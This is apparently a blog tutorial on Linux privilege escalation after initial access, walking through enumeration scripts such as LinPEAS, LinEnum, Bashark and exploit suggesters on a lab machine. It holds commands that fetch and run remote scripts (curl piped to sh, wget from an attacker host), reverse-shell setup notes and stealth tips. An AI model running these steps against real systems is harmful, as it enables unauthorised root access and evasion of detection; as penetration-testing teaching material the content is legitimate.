Linux Privilege Escalation via Automated Script

In this article, we will shed light on some of the automated scripts that can be used to perform Post Exploitation and Enumeration after getting initial accesses on Linux based Devices.

Table of Content

·         Introduction

·         Privilege Escalation Vectors

·         Getting Access on Linux Machine

·         LinPEAS

·         LinEnum

·         Bashark

·         LES: Linux Exploit Suggester

·         LinuxPrivChecker

·         Metasploit: Local_Exploit_Suggester

·         Linux Private-i

·         Linux Smart Enumeration

·         Linux Exploit Suggester 2

·         Conclusion

Introduction

When an attacker attacks a Linux Operating System most of the time they will get a base shell which can be converted into a TTY shell or meterpreter session. This shell is limited in the actions it can perform. So, in order to elevate privileges, we need to enumerate different files, directories, permissions, logs and /etc/passwd files. The number of files inside any Linux System is very overwhelming. Hence, doing this task manually is very difficult even when you know where to look. So, why not automate this task using scripts.

Basically, privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he tries to gather critical information related to systems such as hidden password and weak configured services or applications and etc. All this information helps the attacker to make the post exploit against the machine for getting the higher-privileged shell.

Privilege Escalation Vectors

Following information are considered as critical Information of Windows System:

·         The version of the operating system

·         Any Vulnerable package installed or running

·         Files and Folders with Full Control or Modify Access

·         Mapped Drives

·         Potentially Interesting Files

·         Network Information (interfaces, arp)

·         Firewall Status and Rules

·         Running Processes

·         Stored Credentials

·         Sudo Rights

·         Path Variables

·         Docker

·         Buffer Overflow conditions

·         Cronjobs

·         Capabilities

Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we will elaborate each script that works smoothly.

Getting Access on Linux Machine

This step is for maintaining continuity and for beginners. If you are more of an intermediate or expert then you can skip this and get onto the scripts directly. Or if you have got the session through any other exploit then also you can skip this section.

Since we are talking about the post exploitation or the scripts that can be used to enumerate the conditions or opening to elevate privileges, we first need to exploit the machine. It is rather pretty simple approach. Firstly, we craft a payload using MSFvenom. Apart from the exploit, we will be providing our local IP Address and a local port on which we are expecting to receive the session. After successfully crafting the payload, we run a python one line to host the payload on our port 80. We will use this to download the payload on the target system. After downloading the payload on the system, we start a netcat listener on the local port that we mentioned while crafting the payload. Then execute the payload on the target machine. You will get a session on the target machine.

Refer to our MSFvenom Article to Learn More.

LinPEAS

GitHub Link: LinPEAS

Let’s start from LinPEAS. It was created by Carlos P. It was made with a simple objective that is to enumerate for all the possible ways or methods to Elevate Privileges on a Linux System. One of the best things about LinPEAS is that it doesn’t have any dependency. This makes it enable to run anything that is supported by the pre-existing binaries. LinPEAS has been tested on Debian, CentOS, FreeBSD and OpenBSD. LinPEAS has been designed in such a way that it won’t write anything directly to the disk and while running on default, it won’t try to login as other user through the su command. The amount of time LinPEAS takes varies from 2 to 10 minutes depending on the number of checks that are requested. If you are running WinPEAS inside a Capture the Flag Challenge then don’t shy away from using the -a parameter. It will activate all checks. LinPEAS monitors the processes in order to find very frequent cron jobs but in order to do this you will need to add the -a parameter and this check will write some info inside a file that will be deleted later. This makes it perfect as it is not leaving trace.

Let's talk about other parameters.

-s (superfast & stealth): This will bypass some time-consuming checks and will leave absolutely no trace.

-P (Password): Pass a password that will be used with sudo -l and Bruteforcing other users

-h Help Banner

-o Only execute selected checks

-d <IP/NETMASK> Discover hosts using fping or ping

ip <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports using nc

It exports and unset some environmental variables during the execution so no command executed during the session will be saved in the history file and if you don’t want to use this functionality just add a -n parameter while exploiting it. LinPEAS can be executed directly from the GitHub by using the curl command.

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

 


Here, we can see the Generic Interesting Files Module of LinPEAS at work. Among other things it also enumerates and lists the writable files for the current user and group. Here we can see that Docker group has writable access. So, if we write a file by copying it to a temporary container and then back to the target destination on the host. We might be able to elevate privileges. It is possible because some privileged users are writing files outside a restricted file system.



Moving on we found that there is a python file by the name of cleanup.py inside the mnt directory. It must have execution permissions as cleanup.py is usually linked with a cron job. So, we can enter a shell invocation command



SUID Checks: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have SUID permissions run with higher privileges. Here, LinPEAS have showed us that the target machine has SUID permissions on find, cp and nano.



LinPEAS also checks for various important files for write permissions as well. Here, we can see that the target server has /etc/passwd file writable. This means that the attacker can create a user and password hash on their device and then append that user into the /etc/passwd file with root access and that have compromised the device to the root level.



Next detection happens for the sudo permissions. This means that the current user can use the following commands with elevated access without root password. This can enable the attacker to refer these into the GTFOBIN and find a simple one line to get root on the target machine.



In the beginning we run LinPEAS by taking the SSH of the target machine. In the beginning we run LinPEAS by taking the SSH of the target machine and then using the curl command to download and run the LinPEAS script. But there might be situations where it is not possible to follow those steps. Hence, we will transfer the script using the combination of python one liner on our attacker machine and wget on our target machine.

ls

python -m SimpleHTTPServer 80



We downloaded the script inside the tmp directory as it has written permissions. Also, we must provide the proper permissions to the script in order to execute it.

cd /tmp

wget 192.168.1.5/linpeas.sh

chmod 777 linpeas.sh

./linpeas.sh



LinEnum

GitHub Link: LinEnum

Time to take a look at LinEnum. It was created by Rebootuser.  LinEnum is a shell script that works in order to extract information from the target machine about elevating privileges. It supports an Experimental Reporting functionality that can help to export the result of the scan in a readable report format. It has a few options or parameters such as:

-k Enter keyword

-e Enter export location

-t Include thorough (lengthy) tests

-s Supply current user password to check sudo perms (INSECURE)

-r Enter report name

-h Displays help text

It checks various resources or details mentioned below:

Kernel and distribution release details

System Information:

Hostname, Networking details, Current IP, Default route details, DNS server information

User Information:

Current user details, Last logged on users, shows users logged onto the host, list all users including uid/gid information, List root accounts, Extract’s password policies and hash storage method information, checks umask value, checks if password hashes are stored in /etc/passwd, extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc., attempt to read restricted files i.e., /etc/shadow, List current users history files (i.e. .bash_history, .nano_history etc.), Basic SSH checks

Privileged access:

Which users have recently used sudo, determine if /etc/sudoers is accessible, determine if the current user has Sudo access without a password, are known ‘good’ breakout binaries available via Sudo (i.e., nmap, vim etc.), Is root’s home directory accessible, List permissions for /home/

Environmental:

Display current $PATH, Displays env information

Jobs/Tasks:

List all cron jobs, locate all world-writable cron jobs, locate cron jobs owned by other users of the system, List the active and inactive systemd timers

Services:

List network connections (TCP & UDP), List running processes, Lookup and list process binaries and associated permissions, List Netconf/indecent contents and associated binary file permissions, List init.d binary permissions

Version Information (of the following):

Sudo, MYSQL, Postgres, Apache (Checks user config, shows enabled modules, Checks for htpasswd files, View www directories)

Default/Weak Credentials:

Checks for default/weak Postgres accounts, Checks for default/weak MYSQL accounts

Searches:

Locate all SUID/GUID files, Locate all world-writable SUID/GUID files, Locate all SUID/GUID files owned by root, Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc.), Locate files with POSIX capabilities, List all world-writable files, Find/list all accessible *.plan files and display contents, Find/list all accessible *.rhosts files and display contents, Show NFS server details, Locate *.conf and *.log files containing keyword supplied at script runtime, List all *.conf files located in /etc, .bak file search, Locate mail

Platform/software specific tests:

Checks to determine if we're in a Docker container, checks to see if the host has Docker installed, checks to determine if we're in an LXC container

Here, we are downloading the locally hosted LinEnum script and then executing it after providing appropriate permissions.

wget 192.168.1.5/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh



We can see that it has enumerated for SUID bits on nano, cp and find.



When enumerating the Cron Jobs, it found the cleanup.py that we discussed earlier.



It also checks for the groups with elevated accesses. In this case it is the docker group.



LinEnum also found that the /etc/passwd file is writable on the target machine.

Bashark

GitHub Link: Bashark

Time to surf with the Bashark. It was created by RedCode Labs. Bashark has been designed to assist penetrations testers and security researchers for post-exploitation phase of their security assessment of a Linux, OSX or Solaris Based Server.

Some of the prominent features of Bashark are that it is a bash script that means that it can be directly run from the terminal without any installation. It is fast and doesn’t overload the target machine. It does not have any specific dependencies that you would require to install in the wild. As it wipes its presence after execution it is difficult to be detected after execution. Here, we downloaded the Bashark using wget command which is locally hosted on the attacker machine. Then provided execution permissions using chmod and then run the Bashark script. It upgrades your shell to be able to execute different commands.

cd /tmp

wget 192.168.1.5/bashark.sh

chmod 777 bashark.sh

source bashark.sh



Here we used the getperm -c command to read the SUID bits on nano, cp and find among other binaries. Bashark also enumerated all the common config files path using the getconf command.

getperm -c

getconf

 


LES: Linux Exploit Suggester

GitHub Link: LES

Time to get suggesting with the LES. It was created by Z-Labs.  As other scripts in this article, this tool was also designed to help the security testers or analysts to test the Linux Machine for the potential vulnerabilities and ways to elevate privileges. LES is crafted in such a way that it can work across different versions or flavors of Linux. Extensive research and improvements have made the tool robust and with minimal false positives. The basic working of the LES starts with generating the initial exploit list based on the detected kernel version and then it checks for the specific tags for each exploit. It collects all the positive results and then ranks them according the potential risk and then show it to the user. We can see that the target machine is vulnerable to CVE 2021-3156, CVE 2018-18955, CVE 2019-18634, CVE, 2019-15666, CVE 2017-0358 and others. Now we can read about these vulnerabilities and use them to elevate privilege on the target machine.

chmod 777 les.sh

./les.sh

 






LinuxPrivChecker

GitHub Link: LinuxPrivChecker

Checking some Privs with the LinuxPrivChecker. It was created by Mike Czumak and maintained by Michael Contino. After the bunch of shell scripts, let’s focus of a python script. It is basically a python script that works against a Linux System. It searches for writable files, misconfigurations and clear-text passwords and applicable exploits. It also provides some interesting locations that can play key role while elevating privileges. It starts with the basic system info. Then we have the Kernel Version, Hostname, Operating System, Network Information, Running Services, etc.

python linuxprivchecker.py



LinuxPrivChecker also works to check the /etc/passwd/ file and other information such as group information or write permissions on different files of potential interest.



Metasploit: Local_Exploit_Suggester

For the people who don’t like to get into scripts or those who use Metasploit to exploit the target system are in some cases ended up with a meterpreter session. So, in these instances we have a post exploitation module that can be used to check for ways to elevate privilege as other scripts. All it requires is the session identifier number to run on the exploited target. It will list various vulnerabilities that the system is vulnerable of.

use post/multi/recon/local_exploit_suggester

set session 2

exploit



Linux Private-i

GitHub Link: Linux Private-i

Checking some Privs with the LinuxPrivChecker. It was created by creosote. Linux Private-i can be defined as a Linux Enumeration or Privilege Escalation tool that performs the basic enumeration steps and displays the results in an easily readable format. The script has very verbose option that includes vital checks such as OS info and permissions on common files, search for common applications while checking versions, file permissions and possible user credentials, common apps: Apache/HTTPD, Tomcat, Netcat, Perl, Ruby, Python, WordPress, Samba, Database Apps: SQLite, Postgres, MySQL/MariaDB, MongoDB, Oracle, Redis, CouchDB, Mail Apps: Postfix, Dovecot, Exim, Squirrel Mail, Cyrus, Sendmail, Courier, Checks Networking info - netstat, ifconfig, Basic mount info, crontab and bash history. Here's a snippet when running the Full Scope. This box has purposely misconfigured files and permissions. We see that the target machine has the /etc/passwd file writable. We are also informed that the Netcat, Perl, Python, etc. are installed on the target machine.

chmod 777 private-i.sh

./private-i.sh



Private-i also extracted the script inside the cronjob that gets executed after the set duration of time.



Linux Smart Enumeration

GitHub Link: Linux Smart Enumeration

Keep away the dumb methods time to use the Linux Smart Enumeration. It was created by Diego Blanco. Linux Smart Enumeration is a script inspired from the LinEnum Script that we discussed earlier. The purpose for this script is same as every other scripted are mentioned. This script has 3 levels of verbosity so that the user can control of the amount of information you see. It uses color to differentiate the types of alerts like green means it is possible to use it to elevate privilege on Target Machine. It asks the user if they have the knowledge of the user password so as to check the sudo privilege. It checks the user groups, Path Variables, Sudo Permissions and other interesting files.  

chmod 777 lse.sh

./lse.sh



We can also see the cleanup.py file that gets re-executed again and again by the crontab.



There are the SUID files which can be used to elevate privilege such as nano, cp, find etc. We can also see that the /etc/passwd is writable which can also be used to create a high privilege user and then use it to login in onto the target machine.



Linux Exploit Suggester 2

We discussed about the Linux Exploit Suggester. But now take a look at the Next-generation Linux Exploit Suggester 2. It is heavily based on the first version. There have been some niche changes that include more exploits and it has an option to download the detected exploit code directly from Exploit DB. It has more accurate wildcard matching. It expands the scope of searchable exploits. Last but not the least Colored Output.

chmod 777 linux-exploit-suggester-2.pl

./linux-exploit-suggester-2.pl -k 3

Conclusion

The point that we are trying to convey through this article is that there are multiple scripts and executables and batch files to consider while doing Post Exploitation on Linux-Based devices. We wanted this article to serve as your go-to guide whenever you are trying to elevate privilege on a Linux machine irrespective of the way you got your initial foothold.

0 comments:

Post a Comment